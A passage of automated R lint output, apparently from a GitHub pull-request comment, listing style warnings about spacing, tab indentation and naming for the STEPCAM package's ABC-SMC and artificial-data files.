^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:221:17:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L221) *style:* **Variable and function names should be all lowercase.**\n```r\n​        opt_vec[numberAccepted] <- mean_optimum;\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:224:24:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L224) *style:* **Variable and function names should be all lowercase.**\n```r\n​          next_weights[numberAccepted] = 1\n                       ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:224:40:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L224) *style:* **Use <-, not =, for assignment.**\n```r\n​          next_weights[numberAccepted] = 1\n                                       ^\n```\n[R/ABC_SMC.R:226:24:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L226) *style:* **Variable and function names should be all lowercase.**\n```r\n​          next_weights[numberAccepted] =\n                       ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:226:40:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L226) *style:* **Use <-, not =, for assignment.**\n```r\n​          next_weights[numberAccepted] =\n                                       ^\n```\n[R/ABC_SMC.R:227:13:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L227) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, disp_vals, filt_vals,\n            ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:231:13:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L231) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n            ^\n```\n[R/ABC_SMC.R:231:14:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L231) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:231:34:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L231) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n                                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:237:21:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L237) *style:* **Put spaces around all infix operators.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                   ~^~\n```\n[R/ABC_SMC.R:237:22:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L237) *style:* **Variable and function names should be all lowercase.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                     ^~~~~~~~\n```\n[R/ABC_SMC.R:239:13:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L239) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n            ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:239:38:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L239) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n                                     ^~~~~~~~\n```\n[R/ABC_SMC.R:257:54:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L257) *style:* **Put spaces around all infix operators.**\n```r\n​    file_name <- paste(\"particles_t=\", t, \".txt\", sep=\"\", collapse = NULL)\n                                                    ~^~\n```\n[R/ABC_SMC.R:260:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L260) *style:* **lines should not be more than 80 characters.**\n```r\n​    cat(\" \", mean(disp_vals), mean(filt_vals), mean(comp_vals), \"\\t\", \"accept rate = \",\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:261:9:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L261) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted / (tried-1), \"\\n\")\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:261:32:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L261) *style:* **Put spaces around all infix operators.**\n```r\n​        numberAccepted / (tried-1), \"\\n\")\n                              ~^~\n```\n[R/ABC_SMC.R:264:27:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L264) *style:* **Commas should always have a space after.**\n```r\n​    next_weights <- rep(1,numParticles)\n                          ^\n```\n[R/ABC_SMC.R:264:27:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L264) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_weights <- rep(1,numParticles)\n                          ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:265:20:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L265) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_disp <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:266:20:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L266) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_filt <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:267:20:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L267) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_comp <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:274:61:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L274) *style:* **Put spaces around all infix operators.**\n```r\n​    d <- read.table(paste(\"particles_t=\", t - 2, \".txt\", sep=\"\",\n                                                           ~^~\n```\n[R/ABC_SMC.R:278:63:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L278) *style:* **Put spaces around all infix operators.**\n```r\n​      d <- read.table(paste(\"particles_t=\", t - 1, \".txt\", sep=\"\",\n                                                             ~^~\n```\n[R/ABC_SMC.R:281:15:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L281) *style:* **Put spaces around all infix operators.**\n```r\n​\t    d <- read.table(paste(\"particles_t=\", t, \".txt\", sep=\"\",\n             ~^~~\n```\n[R/ABC_SMC.R:282:44:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/ABC_SMC.R#L282) *style:* **Put spaces around all infix operators.**\n```r\n​\t                          collapse = NULL), header = F)\n                                          ~^\n```\n[R/generateArtificialData.R:4:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L4) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​generate.Artificial.Data <- function(n_species, n_traits, n_communities,\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:6:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tpool_richness <- n_species\n^\n```\n[R/generateArtificialData.R:8:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n^\n```\n[R/generateArtificialData.R:9:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n^\n```\n[R/generateArtificialData.R:9:23:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L9) *style:* **Put spaces around all infix operators.**\n```r\n​\tpool_richness <- n_species\n                     ~^~~\n```\n[R/generateArtificialData.R:10:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n^\n```\n[R/generateArtificialData.R:11:21:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                   ~^~~\n```\n[R/generateArtificialData.R:11:47:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                             ~^~\n```\n[R/generateArtificialData.R:11:49:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L11) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                ^\n```\n[R/generateArtificialData.R:11:64:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                              ~^~\n```\n[R/generateArtificialData.R:12:50:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                ~^~\n```\n[R/generateArtificialData.R:12:58:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                        ~^~\n```\n[R/generateArtificialData.R:13:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:pool_richness) {\n^\n```\n[R/generateArtificialData.R:13:37:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                   ~^~\n```\n[R/generateArtificialData.R:13:54:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                                    ~^~\n```\n[R/generateArtificialData.R:14:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n^\n```\n[R/generateArtificialData.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:16:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:16:12:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L16) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:pool_richness) {\n           ^\n```\n[R/generateArtificialData.R:17:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n^\n```\n[R/generateArtificialData.R:17:22:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L17) *style:* **Put spaces around all infix operators.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n                    ~^~~\n```\n[R/generateArtificialData.R:18:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n^\n```\n[R/generateArtificialData.R:19:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:19:14:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L19) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n            ~^~~\n```\n[R/generateArtificialData.R:19:25:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L19) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n                        ^\n```\n[R/generateArtificialData.R:20:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1[1] <- \"species\"\n^\n```\n[R/generateArtificialData.R:20:12:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L20) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n           ^\n```\n[R/generateArtificialData.R:21:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:21:19:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                 ~^~~\n```\n[R/generateArtificialData.R:21:37:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L21) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                    ^\n```\n[R/generateArtificialData.R:21:40:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                      ~^~\n```\n[R/generateArtificialData.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n^\n```\n[R/generateArtificialData.R:23:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(traits_pool_df) <- row1\n^\n```\n[R/generateArtificialData.R:23:17:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L23) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1[1] <- \"species\"\n               ~^~~\n```\n[R/generateArtificialData.R:24:17:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n               ~^~~\n```\n[R/generateArtificialData.R:24:61:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n                                                           ~^~\n```\n[R/generateArtificialData.R:24:63:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L24) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n                                                              ^\n```\n[R/generateArtificialData.R:25:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n^\n```\n[R/generateArtificialData.R:25:24:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n                      ~^~~\n```\n[R/generateArtificialData.R:26:31:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L26) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(traits_pool_df) <- row1\n                             ~^~~\n```\n[R/generateArtificialData.R:28:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n^\n```\n[R/generateArtificialData.R:28:26:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                        ~^~~\n```\n[R/generateArtificialData.R:28:43:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L28) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                          ^\n```\n[R/generateArtificialData.R:28:58:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                                        ~^~\n```\n[R/generateArtificialData.R:30:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n^\n```\n[R/generateArtificialData.R:31:19:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                 ~^~~\n```\n[R/generateArtificialData.R:31:24:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                      ~^~\n```\n[R/generateArtificialData.R:31:51:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                 ~^~\n```\n[R/generateArtificialData.R:31:59:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                         ~^~\n```\n[R/generateArtificialData.R:32:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L32) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n^\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L33) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n^\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L33) *style:* **lines should not be more than 80 characters.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:33:25:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                       ~^~~\n```\n[R/generateArtificialData.R:33:34:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L33) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                 ^\n```\n[R/generateArtificialData.R:33:61:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                           ~^~\n```\n[R/generateArtificialData.R:33:69:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                    ^~\n```\n[R/generateArtificialData.R:33:74:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                        ~^~\n```\n[R/generateArtificialData.R:33:76:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L33) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                           ^\n```\n[R/generateArtificialData.R:33:89:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                                       ~^~\n```\n[R/generateArtificialData.R:34:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L34) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_communities){\n^\n```\n[R/generateArtificialData.R:35:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L35) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  if(mechanism_random == T){\n^\n```\n[R/generateArtificialData.R:35:47:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                             ~^~\n```\n[R/generateArtificialData.R:35:65:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                                               ~^~~\n```\n[R/generateArtificialData.R:36:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L36) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:36:47:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L36) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n                                             ~^\n```\n[R/generateArtificialData.R:37:12:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L37) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_communities){\n           ^\n```\n[R/generateArtificialData.R:38:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L38) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  }else{\n^\n```\n[R/generateArtificialData.R:38:13:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L38) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  if(mechanism_random == T){\n            ^\n```\n[R/generateArtificialData.R:39:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L39) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 